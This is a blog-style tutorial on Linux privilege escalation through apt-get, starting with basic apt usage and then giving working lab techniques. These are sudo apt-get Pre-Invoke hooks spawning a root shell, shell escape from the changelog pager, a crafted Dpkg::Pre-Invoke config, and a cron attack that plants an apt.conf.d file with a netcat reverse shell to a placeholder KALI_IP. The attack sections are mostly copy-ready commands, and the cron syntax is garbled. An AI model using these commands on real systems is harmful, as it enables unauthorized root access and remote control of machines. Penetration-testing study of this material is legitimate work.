In this article we'll talk
about APT (apt-get) functionality and learn how helpful the apt command is for
Linux peneration testing and how we'll progress apt to scale the greater
privilege shell.
Table of content
Introduction to APT
(apt-get)
·
Major Operation
performed using APT (apt-get)
Exploiting APT (apt-get)
·
Sudo Rights Lab
setups for privilege Escalation
·
Exploiting Sudo
rights: Method -I
·
Exploiting Sudo
rights: Method -II
·
Exploiting Sudo
rights: Method -III
·
Exploiting Cron
job
Introduction to APT (apt-get)
The apt command is a powerful
command-line tool, which works with Ubuntu's Advanced Packaging Tool (APT)
performing such functions as installation of new software packages, upgrade of
existing software packages, updating of the package list index, and even
upgrading the entire Ubuntu system.
Actions of the apt command,
such as installation and removal of packages, are logged in the
/var/log/dpkg.log log file.
For further information about
the use of APT type:
apt-get -h
Major
Operation performed using APT (apt-get)
·
Update the Package: The APT package index
is essentially a database of available packages from the repositories defined
in the /etc/apt/sources.list file and in the /etc/apt/sources.list.d directory.
To update the local package index with the latest changes made in the
repositories, type the following:
apt update
·
Upgrade Packages: Over time, updated
versions of packages currently installed on your computer may become available
from the package repositories (for example security updates). To upgrade your
system, first update your package index as outlined above, and then type:
apt upgrade
apt dist-upgrade
·
Install a Package: we can Installation of
packages using the apt tool which is quite easy. For example, to install the openssh-server, type the following:
apt-get install openssh-server
·
Un-install a package: we can use remove command
to un-install software packages without removing their configuration files.
apt-get remove openssh-server
·
Remove Installed packet: To remove
software packages including their configuration files, use the ‘purge’ sub
command as shown below.
apt-get purge openssh-server
Sudo Rights Lab setups for privilege Escalation
The behavior of apt-get gets changed when run with higher
privilege. Let’s suppose the system admin had given sudo permission to the
local user to run apt-get. This is can be led to privilege escalation once the
system is compromised.
First all let’s revise what is sudo Permission?
In Linux/Unix, a sudoers file inside /etc is the
configuration file for sudo rights. The word sudo represent Super User
Do Root
privilege task. Sudoers file is that file where the users and groups
with root privileges are stored to run some or all commands as root or another
user.
So here, we had given sudo privilege to test user to run
apt-get as root. To add sudo right open etc/sudoers file and type following as
user Privilege specification.
test ALL=(ALL)
NOPASSWD: /usr/bin/apt-get
Exploiting Sudo rights: Method -I
Let’s exploit apt-get
service by abusing sudo user right. Suppose we had local user access of the
targeted system and we want to escalate the root user rights.
So, first we connect
to target machine with ssh and type following command to get access through
local user login.
ssh
test@192.168.1.108
Then we look for sudo right of “test” user (if given) and
found that user “test” can execute apt-get command as “root” (since he has ALL
user’s right) without password.
sudo -l
To exploit sudo right through apt service we just run the
following command which will invoke bash for us with root privilege as shown in
the below image.
sudo apt-get update -o APT::Update::Pre-Invoke::=
/bin/bash
Exploiting
Sudo rights: Method-II
We may use apt-get for viewing changes in the packaged
version of a project. We can therefore enter the following command in order to
call a changelog, which dumps in the editor, like Man, data relating to changes
to the source package.
sudo apt-get changelog apt
This will open the console like a Man editor to read the
apt change log, here we can inject “!/bin/sh” and press enter to execute bash
shell for us.
You get "#" shell that means that we successfully
escalated the root shell, as shown in the following picture.
Exploiting
Sudo rights: Method-III
We can use Dpkg to construct a package instead of using
apt-get to invoke bin / bash. We will first build a temp file, in which we
construct a packaging to call /bin / bash, and then install the package via
apt-get.
TF=$(mktemp)
echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}'
> $TF
sudo apt-get install -c $TF sl
Crontab Lab setups for
privilege Escalation
This strategy is based upon a situation in which we
assume that apt.conf.d can be written in order to plan a cronjob job to update
the package with the command apt-get update. As we have said, we gave
/adt-conf.d complete permission.
chmod 777 apt.conf.d
ls -al
And then schedule the task using crontab to schedule an
update of the software after 2 minutes every time as shown the below image
*/2 * *** root apt-get
update
Exploiting
Cron job
Let’s exploit apt-get service by abusing cron job as we
all know cron job run as root. Suppose we had access to the targeted system locally
and want the root user rights to enhanced limited shell access.
So, first we connect to target machine with ssh and type
following command:
And we know apt.conf.d file has full permission as
said above (You can also manually check to ensure the writable directory using
find command) in the lab setup. Therefore, we will create a malicious file
inside apt.conf.d by injecting netcat reverse backdoor:
echo 'apt::Update::Pre-Invoke {“rm /tmp/f;mkfifo
/tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc KALI_IP 1234 >/tmp/f”};’ >
pwn
Start the netcat listener to access the reverse connection
of the host machine and wait for 2 minutes to obtain the privilege shell since apt-get
update task is scheduled to update the packages every time, after minute through
crontab that runs as root and it runs our netcat backdoor pwn to get reverse
connections as depicted in the image.
Refences:
0 comments:
Post a Comment